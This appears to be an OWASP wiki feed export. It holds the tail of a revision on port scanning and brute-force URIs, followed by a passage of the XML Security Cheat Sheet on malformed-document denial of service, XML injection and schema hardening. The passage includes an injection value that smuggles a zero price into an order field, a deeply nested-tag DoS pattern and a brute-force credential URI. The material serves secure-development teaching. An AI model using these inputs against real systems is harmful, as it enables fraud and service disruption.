''' 4) Time-based '''&lt;br /&gt;
Sometimes the differences between closed and open ports are very subtle. The only way to know the status of a port with certainty is to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack is difficult to accomplish on high-latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224420</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224420"/>
				<updated>2016-12-21T20:05:10Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet shows how these possibilities can be exploited in libraries and software, divided into two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities that rely on documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution upon detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, measure the time taken to process a regular XML document against the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;!-- one&lt;br /&gt;
    &amp;lt;!-- another comment&lt;br /&gt;
  comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack, since it required only half the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this:&lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
     ...&lt;br /&gt;
      &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
&amp;lt;/person&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;, as is the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; element contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
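&lt;br /&gt;
As a hedged sketch of the restrictions that the DTD above cannot express, the same document could be described with XML Schema. The limits used here (256 characters for &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and a maximum of 150 for &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;) are illustrative assumptions, not values taken from any specification:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;!-- assumed limit; pick one that fits the application --&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
            &amp;lt;!-- digits only, zero or greater, with an assumed upper bound --&amp;gt;&lt;br /&gt;
            &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
              &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With facets like these in place, the one-million-digit &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; value fails validation because it exceeds the &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; bound.&lt;br /&gt;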
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. As an example of this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
 &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/choice&amp;gt;&lt;br /&gt;
 &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered it valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions were only partially enforced for the element, which means that the information was probably tested by application code instead of the proposed sample schema.&lt;br /&gt;
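&lt;br /&gt;
For the hexadecimal case mentioned at the start of this section, a minimal sketch could use the built-in &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; type rather than a restricted string. The element name &amp;lt;tt&amp;gt;digest&amp;lt;/tt&amp;gt; and the length are hypothetical. For &amp;lt;tt&amp;gt;hexBinary&amp;lt;/tt&amp;gt; the &amp;lt;tt&amp;gt;length&amp;lt;/tt&amp;gt; facet counts octets, so a value of 16 accepts exactly 32 hexadecimal characters:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;digest&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;!-- hexBinary already rejects any non-hexadecimal character --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:hexBinary&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- assumed size: 16 octets, written as 32 hex digits --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;16&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;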
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, the schema should use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero.  In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. There are specific data types for XML schemas that specifically avoid using the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element. &lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If you see any other type of restriction being used, you may trigger an error if the denominator is zero.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that these data types are commonly used for elements that should only ever hold real numbers, such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
With this schema, the price value cannot be set to Infinity or NaN, because these values are not valid for the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type and the document fails validation. An attacker could exploit this issue if those values were allowed.&lt;br /&gt;
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid:&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML Schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:enumeration value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minLength value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the possible values are restricted to one specific length (let's say 8), the exact length can be specified as follows:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:length value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
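&lt;br /&gt;
Numeric values can be bounded in a similar way. The following sketch assumes a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; element that must stay between 1 and 1000; both the element and the bounds are illustrative and should be adapted to what the receiving application can store:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;!-- assumed bounds: reject zero, negatives, and oversized orders --&amp;gt;&lt;br /&gt;
      &amp;lt;xs:minInclusive value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
      &amp;lt;xs:maxInclusive value=&amp;quot;1000&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
&amp;lt;/xs:element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;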
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add pattern restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific pattern:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
